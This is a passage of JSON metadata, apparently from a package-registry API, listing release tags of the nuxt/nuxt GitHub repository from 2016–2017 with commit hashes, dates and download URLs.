itHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/a